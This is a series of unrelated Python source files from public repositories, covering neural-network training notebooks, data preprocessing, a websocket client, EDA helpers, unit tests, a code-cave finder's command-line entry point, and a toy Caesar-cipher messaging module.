every_history_loss.append(train_loss)\n            every_history_train_acc.append(train_acc)\n            every_history_test_acc.append(test_acc)\n            every_predict.append(predict)\n        return every_history_loss, every_history_train_acc, every_history_test_acc, every_predict\n\n    def train(self):\n        self.net.train()\n        training_loss = 0\n        correct_ans = 0\n        total = 0\n        # put the data in the loader into batch_x, batch_y\n        for step, (batch_X, batch_y) in enumerate(self.train_loader):\n            batch_X, batch_y = batch_X.to('cpu'), batch_y.to('cpu')\n            self.optimizer.zero_grad()\n            pred_outputs = self.net(batch_X)\n#             print(pred_outputs.shape,batch_y.shape )\n#             batch_y = batch_y.view(-1, 1).type(torch.FloatTensor)\n#             print(pred_outputs.shape,batch_y.shape )\n            loss = self.criterion(pred_outputs, batch_y.long())\n#             batch_y = batch_y.type_as(pred_outputs)\n#             loss = self.criterion(pred_outputs.squeeze(), batch_y)\n            # backpropagate from the loss\n            loss.backward()\n            # update all the weights and biases\n            self.optimizer.step()\n            training_loss += loss.item()\n            \n            # take the largest output as the prediction\n#             _, predicted = torch.max(pred_outputs, 1)\n            _, predicted = pred_outputs.max(1)\n            # batch_y.size(0) = number of samples in this batch\n            total += batch_y.size(0)\n            # count how many predictions match batch_y (the actual labels)\n            correct_ans += predicted.eq(batch_y).sum().item() \n            \n        print(' **Training**')\n        print('Loss: %.3f ' % ( training_loss ))\n        print('Acc: %.3f%% (%d/%d)' % (100.*(correct_ans/total), correct_ans, total ))\n        return training_loss, (correct_ans/total)\n\n\n\n    def test(self):\n        #evaluate\n        self.net.eval()\n        testing_loss = 0\n        correct_ans = 0\n        total = 0\n
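        # torch.no_grad() disables gradient tracking for the whole test pass,\n        # so no autograd graph is built while computing loss and accuracy.\n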
        with torch.no_grad(): \n            # put the data in the loader into batch_x, batch_y\n            predict = []\n            for step, (batch_X, batch_y) in enumerate(self.test_loader):\n                batch_X, batch_y = batch_X.to('cpu'), batch_y.to('cpu')\n#                 print(batch_y)\n                #predict the outputs\n                pred_outputs = self.net(batch_X)\n                \n                # interval = 20 draw map\n                predict.append(pred_outputs)\n                # interval = 20 draw map\n\n                loss = self.criterion(pred_outputs, batch_y.long())\n                \n                testing_loss += loss.item()\n                # take the largest output as the prediction\n\n\n                _, predicted = pred_outputs.max(1)\n                # batch_y.size(0) = number of samples in this batch\n                total += batch_y.size(0)\n                # count how many predictions match batch_y (the actual labels)\n                correct_ans += predicted.eq(batch_y).sum().item() \n\n        print(' **Testing**')\n        print('Loss: %.3f ' % ( testing_loss ))\n        print('Acc: %.3f%% (%d/%d)' % (100.*(correct_ans/total), correct_ans, total ))\n        return testing_loss, (correct_ans/total), predict\n\n\n# # run GRU model\n\n# In[432]:\n\n\ngru_module = Model(GRU(), train_loader, test_loader, EPOCH=100, LR=0.0005)\n# draw the acc and loss\nhistory_loss, history_train_acc, history_test_acc, predict_GRU = gru_module.plot_acc()\n\n\n# In[ ]:\n\n\npredict_GRU[-1]\n\n\n# In[433]:\n\n\nfig, ax = plt.subplots(1, 2)\nfig.set_size_inches(12, 4)\nax[0].set_title('Train Accuracy')\nax[0].set_xlabel('Epochs')\nax[0].set_ylabel('Accuracy')\nax[0].plot(history_train_acc)\n\nax[1].set_title('Test Accuracy')\nax[1].set_xlabel('Epochs')\nax[1].set_ylabel('Accuracy')\nax[1].plot(history_test_acc)\n# plt.legend(loc=1)\n\n\n# # run RNN model\n\n# In[434]:\n\n\nrnn_module = Model(RNN(), train_loader, test_loader, EPOCH=100, LR=0.0005)\n\n\nhistory_loss, history_train_acc, history_test_acc, predict_RNN = rnn_module.plot_acc()\n\n\n# In[437]:\n\n\nfig, ax = plt.subplots(1, 2)\nfig.set_size_inches(12, 4)\nax[0].set_title('Train Accuracy')\nax[0].set_xlabel('Epochs')\nax[0].set_ylabel('Accuracy')\nax[0].plot(history_train_acc)\n\nax[1].set_title('Test Accuracy')\nax[1].set_xlabel('Epochs')\nax[1].set_ylabel('Accuracy')\nax[1].plot(history_test_acc)\n# plt.legend(loc=1)\n\n\n# # run LSTM model\n\n# In[423]:\n\n\nlstm_module = Model(LSTM(), train_loader, test_loader, EPOCH=100, LR=0.0005)\n\n\nhistory_loss, history_train_acc, history_test_acc, predict_LSTM = lstm_module.plot_acc()\n\n\n# In[424]:\n\n\nfig, ax = plt.subplots(1, 2)\nfig.set_size_inches(12, 4)\nax[0].set_title('Train Accuracy')\nax[0].set_xlabel('Epochs')\nax[0].set_ylabel('Accuracy')\nax[0].plot(history_train_acc)\n\nax[1].set_title('Test Accuracy')\nax[1].set_xlabel('Epochs')\nax[1].set_ylabel('Accuracy')\nax[1].plot(history_test_acc)\n# plt.legend(loc=1)\n\n\n# In[425]:\n\n\nclass last_20_prediction():\n    def __init__(self, net , test_data):\n        self.net = net\n        self.test_loader = test_data\n\n    def test(self):\n        #evaluate\n        self.net.eval()\n        with torch.no_grad(): \n            # put the data in the loader into batch_x, batch_y\n            predict = []\n            for step, (batch_X, batch_y) in enumerate(self.test_loader):\n                batch_X, batch_y = batch_X.to('cpu'), batch_y.to('cpu')\n                pred_outputs = self.net(batch_X)\n                \n                # interval = 20 draw map\n                predict.append(pred_outputs)\n\n            return predict\n\n\n# In[426]:\n\n\n# first comment out the train function\nlast_20_prediction_module = last_20_prediction(LSTM(), last_20_test_loader)\nlast_20_prediction_ans = last_20_prediction_module.test()\n\n\n# In[395]:\n\n\nlast_20_prediction_ans\n\n\n# # draw the world map\n\n# In[435]:\n\n\nimport pygal\nfrom pygal.style import DarkStyle\n\n\n# In[397]:\n\n\nlast_20_prediction_ans[0][0][0].item()\n\n\n# In[427]:\n\n\n# convert probs into outputs and get the country names\n
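# The loop below compares the two logits per country by hand; an equivalent\n# shorthand (a sketch, not part of the original run) is\n# last_20_prediction_ans[0].argmax(dim=1), where 0 = ascending and 1 = descending.\n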
ascending = []\nascending_prob = []\ndescending = []\ndescending_prob = []\nfor i, x in enumerate(last_20_prediction_ans[0]):\n    if last_20_prediction_ans[0][i][0] >= last_20_prediction_ans[0][i][1]:\n        ascending.append(df.iloc[i+1:i+2,0:1].values[0][0])\n        ascending_prob.append(last_20_prediction_ans[0][i][0].item())\n    else:\n        descending.append(df.iloc[i+1:i+2,0:1].values[0][0])\n        descending_prob.append(last_20_prediction_ans[0][i][1].item())\n\n\n# In[399]:\n\n\nprint(ascending[0])\n\n\n# In[400]:\n\n\nlen(ascending)\n\n\n# In[428]:\n\n\n# look up the two-letter code for a country name in the COUNTRIES dict of the i18n module\nfrom pygal_maps_world.i18n import COUNTRIES\n\ndef get_country_code(last_20_country_name):\n    country_code = []\n    for i in range(len(last_20_country_name)):\n        # iterate over all key-value pairs of the dict\n        for code, name in COUNTRIES.items():\n            if name == last_20_country_name[i]: # map the country name to its two-letter code\n                country_code.append(code)\n    \n    return country_code\n#     return None # return None if nothing was found\n\n\n# In[429]:\n\n\n# get all the country code\ncountry_code_ascending = get_country_code(ascending)\ncountry_code_descending = get_country_code(descending)\n\n\n# In[430]:\n\n\nascending_dict = dict(zip(country_code_ascending, ascending_prob))\ndescending_dict = dict(zip(country_code_descending, descending_prob))\n\n\n# In[436]:\n\n\nworldmap_chart = pygal.maps.world.World(style=DarkStyle)\n\nworldmap_chart.title = 'Some countries'\nworldmap_chart.add('ascending', ascending_dict)\nworldmap_chart.add('descending',descending_dict)\nworldmap_chart.render_in_browser()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"charlottelin720/RNN-VAE","sub_path":"problem_1.py","file_name":"problem_1.py","file_ext":"py","file_size_in_byte":14906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"567489175","text":"import collections, numpy as np\n\nclass BlancClass(object):\n    \"\"\"blank container class for having a collection of attributes\"\"\"\n\nclass BestSolution(object):\n    \"\"\"container to keep track of the best solution seen\"\"\"\n    def __init__(self, x=None, f=np.inf, evals=None):\n        \"\"\"initialize the best solution with `x`, `f`, and `evals`.\n        Better solutions have smaller `f`-values.\n\n        \"\"\"\n        self.x = x\n        self.x_geno = None\n        self.f = f if f is not None and f is not np.nan else np.inf\n        self.evals = evals\n        self.evalsall = evals\n        self.last = BlancClass()\n        self.last.x = x\n        self.last.f = f\n\n    def update(self, arx, xarchive=None, arf=None, evals=None):\n        \"\"\"checks for better solutions in list `arx`, based on the smallest\n        corresponding value in `arf`, alternatively, `update` may be called\n        with a `BestSolution` instance like ``update(another_best_solution)``\n        in which case the better solution becomes the current best.\n\n        `xarchive` is used to retrieve the genotype of a solution.\n\n        \"\"\"\n        if arf is not None: # find failsafe minimum\n            minidx = np.nanargmin(arf)\n            if minidx is np.nan:\n                return\n            minarf = arf[minidx]\n            # minarf = reduce(lambda x, y: y if y and y is not np.nan and y < x else x, arf, np.inf)\n        if type(arx) == BestSolution:\n            if self.evalsall is None:\n                self.evalsall = arx.evalsall\n            elif arx.evalsall is not None:\n                self.evalsall = max((self.evalsall, arx.evalsall))\n            if arx.f is not None and arx.f < np.inf:\n                self.update([arx.x], xarchive, [arx.f], arx.evals)\n            return self\n        elif minarf < np.inf and (minarf < self.f or self.f is None):\n            self.x, self.f = arx[minidx], arf[minidx]\n            self.x_geno = xarchive[self.x]['geno'] if xarchive is not None else None\n            self.evals = None if not evals else evals - len(arf) + minidx+1\n            self.evalsall = evals\n
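        # otherwise no new best was found: only record the evaluation count\n        elif evals:\n            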
self.evalsall = evals\n self.last.x = arx[minidx]\n self.last.f = minarf\n def get(self):\n \"\"\"return ``(x, f, evals)`` \"\"\"\n return self.x, self.f, self.evals, self.x_geno\n\n#____________________________________________________________\n#____________________________________________________________\n#\n\n#\n","repo_name":"Degiacomi-Lab/JabberDock","sub_path":"POW_v2/optimizers/BestSolution.py","file_name":"BestSolution.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"54"} +{"seq_id":"71587165921","text":"import argparse\nimport os\n\nimport torch as th\nimport torch.nn as nn\n\nfrom dgl import save_graphs\n\nfrom dgl.data import (\n BACommunityDataset,\n BAShapeDataset,\n TreeCycleDataset,\n TreeGridDataset,\n)\nfrom models import Model\n\n\ndef main(args):\n if args.dataset == \"BAShape\":\n dataset = BAShapeDataset(seed=0)\n elif args.dataset == \"BACommunity\":\n dataset = BACommunityDataset(seed=0)\n elif args.dataset == \"TreeCycle\":\n dataset = TreeCycleDataset(seed=0)\n elif args.dataset == \"TreeGrid\":\n dataset = TreeGridDataset(seed=0)\n\n graph = dataset[0]\n labels = graph.ndata[\"label\"]\n n_feats = graph.ndata[\"feat\"]\n num_classes = dataset.num_classes\n\n model = Model(n_feats.shape[-1], num_classes)\n loss_fn = nn.CrossEntropyLoss()\n optim = th.optim.Adam(model.parameters(), lr=0.001)\n\n for epoch in range(500):\n model.train()\n # For demo purpose, we train the model on all datapoints\n # In practice, you should train only on the training datapoints\n logits = model(graph, n_feats)\n loss = loss_fn(logits, labels)\n acc = th.sum(logits.argmax(dim=1) == labels).item() / len(labels)\n\n optim.zero_grad()\n loss.backward()\n optim.step()\n\n print(f\"In Epoch: {epoch}; Acc: {acc}; Loss: {loss.item()}\")\n\n model_stat_dict = model.state_dict()\n model_path = os.path.join(\"./\", f\"model_{args.dataset}.pth\")\n th.save(model_stat_dict, model_path)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Dummy model training\")\n parser.add_argument(\n \"--dataset\",\n type=str,\n default=\"BAShape\",\n choices=[\"BAShape\", \"BACommunity\", \"TreeCycle\", \"TreeGrid\"],\n )\n args = parser.parse_args()\n print(args)\n\n main(args)\n","repo_name":"dmlc/dgl","sub_path":"examples/pytorch/gnn_explainer/train_main.py","file_name":"train_main.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":12455,"dataset":"github-code","pt":"54"} +{"seq_id":"1490250700","text":"import argparse\nimport os\nimport time\nfrom code_splunker.splunk import splunk\n\nbanner = \"\"\"\n _____ _ _____ _ _\n/ __ \\ | | / ___| | | | |\n| / \\/ ___ __| | ___ \\ `--. _ __ | |_ _ _ __ | | _____ _ __\n| | / _ \\ / _` |/ _ \\ `--. 
\\ '_ \\| | | | | '_ \\| |/ / _ \\ '__|\n| \\__/\\ (_) | (_| | __/ /\\__/ / |_) | | |_| | | | | < __/ |\n \\____/\\___/ \\__,_|\\___| \\____/| .__/|_|\\__,_|_| |_|_|\\_\\___|_|\n | |\n |_| \"\"\"\ndef file_path(string):\n if os.path.isfile(string):\n return string\n else:\n raise NotADirectoryError(string)\n\ndef main():\n parser = argparse.ArgumentParser(description = 'Locate code caves within a program')\n parser.add_argument('-f','--file', required=True,help='File to look for codecaves')\n parser.add_argument('-s','--size',type=int , required = True, help='Minimum size of cave to look for')\n args = parser.parse_args()\n file_path(args.file)\n if args.size >= 0:\n pass\n else:\n raise ValueError(\"Minimum cave size was be greater or equal to 0!\")\n print(banner)\n print('[*] Starting the code splunking process...')\n print(\" \")\n time.sleep(2)\n # Start the code cave search process\n splunk(args.file,args.size)\n print('[*] Splunking complete')\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Ajstroze/code_splunker","sub_path":"code_splunker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"24914426314","text":"import pandas as pd\nimport preprocessing as prc\n\ndf = prc.read_initial_dataframe()\n# drop useless features\ndf.drop(columns=['city', 'region', 'street', 'house'], inplace=True)\n# drop few apartments without target variable\ndf.dropna(subset=['price', 'nearest_subway', 'nearest_subway_time'], inplace=True)\ndf = prc.adjust_housing_type(df)\n\ndf = prc.adjust_nearest_subway_time(df)\ndf.drop(columns=['nearest_subway_time'], inplace=True)\n\ndf = prc.adjust_districts(df)\n\ndf_primary, df_secondary = prc.split_on_primary_secondary(df)\ndf_primary = prc.drop_columns_with_many_nans(df_primary, 0.35, ['house_type'])\n\ndf_primary = prc.adjust_areas(df_primary)\ndf_primary = prc.fillna_areas(df_primary)\n\ndf_primary = prc.adjust_completion_date(df_primary)\ndf_primary.completion_date.fillna(df_primary.completion_date.median(), inplace=True)\n\ndf_primary = prc.adjust_floor_number(df_primary)\n\ndf_primary = prc.adjust_house_type(df_primary)\ndf_primary.house_type.fillna('Панельный', inplace=True)\n\ndf_primary = prc.adjust_price(df_primary)\n\ndf_secondary = prc.drop_columns_with_many_nans(df_secondary, 0.4)\n\ndf_secondary.drop(columns=['bathroom_type', 'window_view', 'build_date',\n 'overlap_type', 'heating', 'elevators', 'emergency',\n 'apartment_renovation', 'entrances'], inplace=True)\n\ndf_secondary.house_build_date.fillna(int(df_secondary.house_build_date.mean()), inplace=True)\n\ndf_secondary = prc.adjust_house_type(df_secondary)\ndf_secondary.house_type.fillna('Панельный', inplace=True)\n\ndf_secondary = prc.adjust_areas(df_secondary)\ndf_secondary = prc.fillna_areas(df_secondary)\n\ndf_secondary = prc.adjust_floor_number(df_secondary)\n\ndf_secondary = prc.adjust_price(df_secondary)\n\napartments_df = pd.concat([df_primary.rename(columns={'completion_date': 'house_build_date'}), df_secondary])\napartments_df.house_build_date = apartments_df.house_build_date.astype(int)\napartments_df = apartments_df[['district', 'housing_type', 'house_type',\n 'house_build_date', 'floor_number', 'total_area',\n 'living_area', 'kitchen_area',\n 'nearest_subway', 'subway_type', 'subway_time', 'price']]\napartments_df.to_csv(\"../preprocessed_dataframes/apartments.csv\")\n\n\n# getting separate secondary apartments dataframe\n_, df_secondary2 = 
prc.split_on_primary_secondary(df)\ndf_secondary2 = prc.drop_columns_with_many_nans(df_secondary2, 0.5)\n# drop useless features\ndf_secondary2.drop(columns=['housing_type', 'overlap_type', 'emergency',\n 'bathroom_type', 'build_date', 'elevators'], inplace=True)\n\ndf_secondary2 = prc.adjust_areas(df_secondary2)\ndf_secondary2 = prc.fillna_areas(df_secondary2)\n\ndf_secondary2 = prc.adjust_floor_number(df_secondary2)\n\ndf_secondary2.apartment_renovation.fillna('Без ремонта', inplace=True)\n\ndf_secondary2.house_build_date.fillna(int(df_secondary2.house_build_date.mean()), inplace=True)\n\ndf_secondary2.house_type.fillna('Панельный', inplace=True)\n\ndf_secondary2 = prc.adjust_ceiling_high(df_secondary2)\ndf_secondary2.ceiling_high.fillna(df_secondary2.ceiling_high.median(), inplace=True)\n\ndf_secondary2.window_view.fillna(df_secondary2.window_view.value_counts().index[0], inplace=True)\n\ndf_secondary2.entrances.fillna(df_secondary2.entrances.median(), inplace=True)\n\ndf_secondary2.heating.fillna(df_secondary2.heating.value_counts().index[0], inplace=True)\n\ndf_secondary2 = prc.adjust_price(df_secondary2)\n\ndf_secondary2.house_build_date = df_secondary2.house_build_date.astype(int)\ndf_secondary2.entrances = df_secondary2.entrances.astype(int)\ndf_secondary2 = df_secondary2[['district', 'house_type', 'house_build_date', 'floor_number',\n 'entrances', 'heating', 'window_view', 'ceiling_high',\n 'apartment_renovation', 'total_area', 'living_area',\n 'kitchen_area', 'nearest_subway', 'subway_type', 'subway_time', 'price']]\ndf_secondary2.to_csv(\"../preprocessed_dataframes/secondary_apartments.csv\")\n","repo_name":"ESkripichnikov/real-estate-market-analysis","sub_path":"data_preprocessing/get_preprocessed_dataframes.py","file_name":"get_preprocessed_dataframes.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26279759963","text":"class Solution:\n def simplifyPath(self, path: str) -> str:\n stack = []\n path = path.split('/')\n \n for i in path:\n if i not in ['.', '..', '']:\n stack.append(i)\n else:\n if i == '..' 
and len(stack) != 0:\n stack.pop()\n return '/' + '/'.join(stack)\n","repo_name":"zhiqinlei/ProblemSolved","sub_path":"0071-Simplify-Path.py","file_name":"0071-Simplify-Path.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7633002761","text":"import asyncio\nimport signal\nimport logging\nimport datetime\nimport secrets\nimport random\nfrom tornado.websocket import websocket_connect\nfrom tornado.httpclient import HTTPRequest, HTTPClientError\n\n'''\nNotes:\n\nhttps://www.tornadoweb.org/en/stable/websocket.html#tornado.websocket.WebSocketClientConnection\nhttps://www.tornadoweb.org/en/stable/httpclient.html#tornado.httpclient.HTTPRequest\n* Note request vs connect timeouts\n\n'''\n\nclass SpoolClient:\n\n def __init__(self, name, url):\n self.name = name\n self.url = url\n self.conn = None\n\n # Connection management\n self.locally_closed = False\n self.conn_retrigger = None\n\n\n #-- Callback Based System -----------------------------------------------------------------#\n\n async def connect(self):\n if self.conn is not None:\n raise Exception(\"Already connected\")\n\n remaining_connection_attempts = 5\n while True:\n try:\n print(\"Attempt a connection\")\n # Make our connection\n request = HTTPRequest(url=self.url,request_timeout=5)\n self.conn = await websocket_connect(\n url=request, on_message_callback=self.on_message )\n\n # Await to keep open: triggered by `on_close`\n self.locally_closed = False\n self.conn_retrigger = asyncio.Event()\n print(\"Connected\")\n await self.conn_retrigger.wait()\n\n # Reengage reconnection attemps\n print(\"Connection is lost\")\n remaining_connection_attempts = 5\n\n except HTTPClientError as err:\n print(\"err!\",err)\n self.conn = None\n except ConnectionRefusedError as err:\n print('refused!!!!',err)\n self.conn = None\n finally:\n print(\"Finally\")\n if self.locally_closed:\n return\n remaining_connection_attempts -= 1\n if remaining_connection_attempts > 0:\n print(\"waiting to try connecting again\")\n await asyncio.sleep(1)\n else:\n raise Exception(\"Could not connect\")\n print('done connect')\n\n '''\n def reconnect()...\n '''\n\n def close(self):\n if self.conn is not None:\n print(\"closing\")\n self.locally_closed = True\n self.conn.close()\n self.conn = None\n\n def on_closed(self):\n if self.locally_closed:\n print(\"on_closed: local close\")\n else:\n print(\"on_closed: Try to reconnect\")\n self.conn.close() # Needed?\n self.conn = None\n self.conn_retrigger.set()\n\n def on_message(self, message):\n if message is None:\n self.on_closed()\n else:\n print(\" ==>\",message)\n\n #-- Await System -----------------------------------------------------------------------------#\n\n async def connect2(self):\n # Should be called only once\n\n while True:\n try:\n print(\"Attempt a connection\")\n request = HTTPRequest(url=self.url,request_timeout=5)\n self.conn = await websocket_connect(url=request)\n print(\"connected\")\n while True:\n msg = await self.conn.read_message()\n if msg is None:\n break\n self.on_message2(msg)\n print(\"closed\")\n\n except HTTPClientError as err:\n print(\"err!\",err)\n self.conn = None\n except ConnectionRefusedError as err:\n print('refused!!!!',err)\n self.conn = None\n finally:\n self.conn = None\n print(\"finally\")\n\n print(\"Wait to try connecting again\")\n await asyncio.sleep(1)\n\n print(\"completed\")\n\n def on_message2(self, message):\n print(\" ==>\",message)\n\n\n #-- Write 
------------------------------------------------------------------------------------#\n\n def write_something(self):\n if self.conn is None:\n return\n msg = f\"{self.name} {datetime.datetime.now()}\"\n print(\"<==\",msg)\n self.conn.write_message(msg)\n\n\nasync def main():\n # Set a custom name\n name = secrets.token_urlsafe(6)\n url = 'ws://localhost:8898/api/ws/channel/'\n\n # Make our client and await it connecting\n client = SpoolClient(name,url)\n\n # Ways of connecting\n conn_meth = 3\n if 1 == conn_meth:\n await client.connect()\n if 2 == conn_meth:\n asyncio.create_task(client.connect(),name=\"First conn\")\n if 3 == conn_meth:\n asyncio.create_task(client.connect2(),name=\"First conn\")\n\n # Define a periodic message\n # Note this can hang\n async def send_something():\n while True:\n client.write_something()\n sleep_for = 2+4*random.random()\n await asyncio.sleep(sleep_for)\n asyncio.create_task(send_something(),name=\"Send Something\")\n\n # Setup the shutdown systems\n shutdown_trigger = asyncio.Event()\n is_shutdown_triggered = False\n async def exit_handler(signame):\n nonlocal is_shutdown_triggered\n if is_shutdown_triggered:\n logging.info(\"already shutting down\")\n else:\n is_shutdown_triggered = True\n logging.info(\"shutdown start...\")\n try:\n client.close()\n except Exception as e:\n logging.error(f\"Error on shutdown: {e}\")\n logging.info(\"...shutdown complete\")\n shutdown_trigger.set()\n\n # Setup signal handlers\n loop = asyncio.get_event_loop()\n for signame in ('SIGINT', 'SIGTERM'):\n loop.add_signal_handler(\n getattr(signal, signame),\n lambda signame=signame: asyncio.create_task(exit_handler(signame))\n )\n\n # Block on the shutdown trigger\n await shutdown_trigger.wait()\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"jeffreyleblanc/base-web-backend","sub_path":"client-server-medium/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14305921669","text":"\"\"\"\nuse this as im ported libary\nimport eda_methods as eda\n\"\"\"\nimport pandas as pd\nimport seaborn as sns\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\ndef meta(df, transpose=True):\n \"\"\"\n This function returns a dataframe that lists:\n - column names\n - nulls abs\n - nulls rel\n - dtype\n - duplicates\n - number of diffrent values (nunique)\n \"\"\"\n metadata = []\n dublicates = sum([])\n for elem in df.columns:\n\n # Counting null values and percantage\n null = df[elem].isnull().sum()\n rel_null = round(null/df.shape[0]*100, 2)\n\n # Defining the data type\n dtype = df[elem].dtype\n\n # Check dublicates\n duplicates = df[elem].duplicated().any()\n\n # Check number of nunique vales\n nuniques = df[elem].nunique()\n\n\n # Creating a Dict that contains all the metadata for the variable\n elem_dict = {\n 'varname': elem,\n 'nulls': null,\n 'percent': rel_null,\n 'dtype': dtype,\n 'dup': duplicates,\n 'nuniques': nuniques\n }\n metadata.append(elem_dict)\n\n meta = pd.DataFrame(metadata, columns=['varname', 'nulls', 'percent', 'dtype', 'dup', 'nuniques'])\n meta.set_index('varname', inplace=True)\n meta = meta.sort_values(by=['nulls'], ascending=False)\n if transpose:\n return meta.transpose()\n print(f\"Shape: {df.shape}\")\n\n return meta\n\ndef data_loss(df_clean, df_raw):\n \"\"\"\n This function returns the data loss in percent.\n \"\"\"\n return f\"{round((df_clean.shape[0]/df_raw.shape[0])*100,3)}% data 
loss\"\n\ndef describe_plus(df, transpose=True):\n \"\"\"\n This function returns a dataframe based on describ() function added:\n - skew()\n - kurtosis()\n - variance\n \"\"\"\n statistics = pd.DataFrame(df.describe())\n skew = pd.Series(df.skew())\n kurtosis = pd.Series(df.kurtosis())\n variance = pd.Series(df.var())\n\n statistics.loc['skew'] = skew\n statistics.loc['kurtosis'] = kurtosis\n statistics.loc['variance'] = variance\n\n if transpose:\n return round(statistics.transpose(), 2)\n return round(statistics, 2)\n\ndef correlogram(df):\n \"\"\"\n This function plots a correlogram.\n \"\"\"\n #Plot\n fig, ax = plt.subplots(figsize=(15, 10))\n mask = np.triu(df.corr())\n ax = sns.heatmap(round(df.corr()*100, 0),\n annot=True,\n mask=mask, cmap=\"coolwarm\")\n return df.corr().round(2)\n\ndef plot_train_test_split(y, y_train, y_test):\n \"\"\"\n This function plots the the sizes of training and test set.\n Also you will get a dataframe with the number of values and the relative distribution.\n \"\"\"\n # plot\n y.plot.hist()\n y_train.plot.hist()\n y_test.plot.hist()\n\n # dataframe with relative and absolut values\n plt.legend(['all', 'train', 'test'])\n storage = pd.DataFrame()\n storage['train abs'] = round(y_train.value_counts(), 2)\n storage['train %'] = round((y_train.value_counts()/y_train.shape[0]), 2)\n storage['test abs'] = round(y_test.value_counts(), 2)\n storage['test %'] = round((y_test.value_counts()/y_test.shape[0]), 2)\n storage['all abs'] = round(y.value_counts(), 2)\n storage['all %'] = round((y.value_counts()/y.shape[0]), 2)\n\n # prints informations about splits\n print (\"Training set has {} samples.\".format(y_train.shape[0]))\n print (\"Testing set has {} samples.\".format(y_test.shape[0]))\n return storage\n","repo_name":"jb-ds2020/nf-ds3-capstone-churn-prevention","sub_path":"eda_methods.py","file_name":"eda_methods.py","file_ext":"py","file_size_in_byte":3494,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"26979364397","text":"\"\"\" Unit tests for qt_event_handler.py \"\"\"\n\n# pylint: disable=R0201, C0103\n\nimport unittest\n\n# pylint: disable=ungrouped-imports\nfrom unittest.mock import (\n patch,\n Mock\n)\n# pylint: enable=ungrouped-imports\nfrom itasks import ItasksService\nfrom itasks_components import ItasksComponent\nfrom qt_event_handler import QtEventHandler\n\n\nclass TestQtEventHandler(unittest.TestCase):\n \"\"\" Unit test class \"\"\"\n\n @patch('itasks.itasks_service.ItasksService')\n def test_button_cl1icked_event(self, itasks_service):\n \"\"\"\n method: button_clicked_event\n state: button clicked\n expected_result: itasks_service.send_ui_event called with correct data\n \"\"\"\n # Assign\n qpushbutton = Mock()\n button = Mock()\n button.qwidget = qpushbutton\n button.action_id = \"Ok\"\n button.task_id = \"2-0\"\n\n # Act\n QtEventHandler.button_clicked_event(button)\n\n # Asserts\n itasks_service._ItasksService__instance.send_ui_event.\\\n assert_called_once_with(\n {\n \"instanceNo\": 2,\n \"taskNo\": 0,\n \"action\": \"Ok\"\n }\n )\n\n @patch('itasks.itasks_service.ItasksService')\n @patch('PyQt5.QtWidgets.QLineEdit.text', return_value='kaas')\n def test_textbox_changed_event(self, text_function, itasks_service):\n \"\"\"\n method: textbox_changed_event\n state: text changed\n expected_result: itasks_service.send_ui_event called with correct data\n \"\"\"\n # Assign\n qlineedit = Mock()\n qlineedit.text = text_function\n textbox = Mock()\n textbox.qwidget = qlineedit\n 
textbox.task_id = \"2-1\"\n textbox.editor_id = \"v\"\n\n # Act\n QtEventHandler.textbox_changed_event(textbox)\n\n # Asserts\n itasks_service._ItasksService__instance.send_ui_event.\\\n assert_called_once_with(\n {\n \"instanceNo\": 2,\n \"taskNo\": 1,\n \"edit\": \"v\",\n \"value\": \"kaas\"\n }\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"tbeuzenberg/iTasks","sub_path":"test/test_qt_event_handler/test_qt_event_handler.py","file_name":"test_qt_event_handler.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19693746942","text":"#taking x as input; it will default in string\r\nx = input(\"Enter a three digit number from 001-999\")\r\n#taking two variable and listing them x\r\ny = list(x)\r\nz = list(x)\r\nk = int(x)\r\nif int(k) <= 0 or int(k) >= 999:\r\n print(\"Hey idiot! You were told to type a three digit number from 001-999\")\r\n exit(1)\r\n#changing the characters\r\ny[0]=x[2]\r\ny[1]=x[1]\r\ny[2]=x[0]\r\n#taking two variable for sentences to join them\r\nori = \"Original Value =\"\r\nrev = \":) Reversed value =\"\r\n#taking two variables to map and remove brackets & commas of the listed numbers\r\nm = ''. join(map(str, z))\r\nn = ''. join(map(str, y))\r\n#printing both sentences and values\r\nprint(ori, m)\r\nprint(rev, n)\r\n","repo_name":"SNV-008/-Hello_World-_This_is_my_first_repositery","sub_path":"Swapping digits of a number.py","file_name":"Swapping digits of a number.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"36590024238","text":"\"\"\"\r\nThis module uses a caesar shift to encrypt messages\r\nThere is a dynamic key that is picked at random\r\nThe key is shared between clients using metadata messages that are not encrypted\r\nIt is very easy to hack (slightly better than v1.0 though)\r\n\"\"\"\r\n\r\nkey = None\r\n\r\n\r\ndef send(message):\r\n \"\"\"Applies encryption and adds any metadata to a message\"\"\"\r\n global key, printable\r\n if key is None:\r\n key = random(1, len(printable))\r\n ciphertext = encrypt(message, key)\r\n mercury_server_send(ciphertext)\r\n\r\n\r\ndef receive(message):\r\n \"\"\"Removes any encryption and metadata from a message\"\"\"\r\n global key\r\n if message.startswith('$key:'):\r\n if key is None:\r\n key = int(message[5:])\r\n success('Got key!')\r\n elif message.startswith('$requestkey'):\r\n if key is not None:\r\n mercury_server_send('$key:%d' % key)\r\n 